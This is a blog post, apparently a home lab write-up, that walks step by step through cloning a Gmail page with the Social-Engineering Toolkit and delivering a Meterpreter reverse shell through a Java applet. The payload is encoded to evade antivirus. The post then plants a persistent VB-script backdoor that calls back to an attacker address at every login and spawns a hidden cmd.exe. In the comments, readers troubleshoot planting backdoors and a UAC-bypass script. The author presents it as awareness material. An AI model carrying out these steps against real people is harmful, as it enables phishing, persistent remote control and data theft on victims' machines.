Social Engineering Toolkit and Metasploit: Web cloning attack and uploading a backdoor

Choose 1 for Social-Engineering Attacks.

Choose 2 for Website Attack Vectors.

Choose 1 for Java Applet Attack Method.

Choose 1 for Web Templates.

Choose 2 for gmail.

Choose 2 for Windows Reverse_TCP Meterpreter as the stager.

Choose 2 for shikata ganai encoding for av detection evasion, metasploit encodes the payload 4 times to avoid av detection, for the target machine it has no av, hence encoding is not necessary.

payload is encoded 4 times, however this iteration is far from enough, av can still detect the payload easily. SET makes interoperating with metasploit really easily.

The cloned web server is ready to accept connection from any victim.

In the past I used to click on unknown java popup, as I did not know the implication of clicking it blindly. However if the victim is not cautious and click on this unknown java applet the payload will be uploaded to victim's machine.

This is what happened in attacker's machine if the unknown java is clicked by victim. 2 meterpreter sessions are created.

session -l is to list the available meterpreter sessions.

session -i option is to interact with the chosen meterpreter session.

If the attacker wishes, a cmd.exe can be spawned in a hidden process.

Creating a persistent backdoor

You can choose where you want to plant the backdoor and choose when you want the backdoor to start, and which address to connect to.

run persistent -A -L c:\Users\cyrus\Downloads -U -p 443 -r 192.168.20.13 This command instructs that the backdoor vb script shall be uploaded to c:UserscyrusDownloads, will be activated once user logs in, the vb script will connect back to 192.168.20.13 at tcp port 443.

This is the vb script uploaded to victim's machine from attacker's machine via meterpreter session.

All meterpreter sessions was lost because victim had rebooted his machine.

A meterpreter session 4 is created after user has logged in.

Attacker spawned a cmd.exe on victim's machine.

Afterword

Modern antivirus program is capable of detecting such backdoor and even prevent the download of the encoded payload into victim’s machine; payload encoded by shikata ganai 4 times is not enough to evade most of the modern antivirus program.

In the past I used to click and execute unknown java applet without knowing the implication. This post is a simple and straight forward lab demonstration to create awareness to people who do not understand the implication of your action when you click on something you do not understand.

Advertisements
This entry was posted in Security, Vulnerability Assessment and Pentest and tagged , , , , , , , , , . Bookmark the permalink.

6 Responses to Social Engineering Toolkit and Metasploit: Web cloning attack and uploading a backdoor

  1. MapEndo says:

    Hello,
    would you tell me what is the windows set up? I am receiving the following error from Microsoft :
    Error : Permission denied
    Code:800A0046
    Source:Microsoft VBScript runtime error.
    I browsed up the net and I found that it might be related to the UAC but my UAC is desactived.
    Could you help me? Thank you

  2. cyruslab says:

    Hmm.. I have not received this error before, were you trying to plant a backdoor? In fact when I did the SET + Metasploit thing with Win7 I did not deactivate UAC at all.
    What exploits were you trying to use? Perhaps I could replicate your method and see if there is this error or problem with Win7 Pro?

  3. MapEndo says:

    I am using the Java applet and the payload is Meterpreter reverse tcp. And I am using Win7 Pro without SP1. From the error I understand that the script is not allowed to run. I tried it on Windows XP it works without a hitch.
    And the window which pops up is named : Windows Script Host…
    Thanks for your help

  4. MapEndo says:

    And another question, I do not understand what’s going on with my SET. the script to bypass UAC is not working properly.I have updated SET and Metasploit as well. Do you have any ideas what may be the problem? when I run the script I do not have a new meterpreter session where the UAC is disabled.
    Thank you

  5. cyruslab says:

    I have no idea about the problem yet unless I encountered it. I will try to do the security lab and see if your problem can be replicated or not.

  6. Allen says:

    Nice work Keep it up

    And this is also good video maybe you like it

    http://www.securitytube.net/video/2684

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s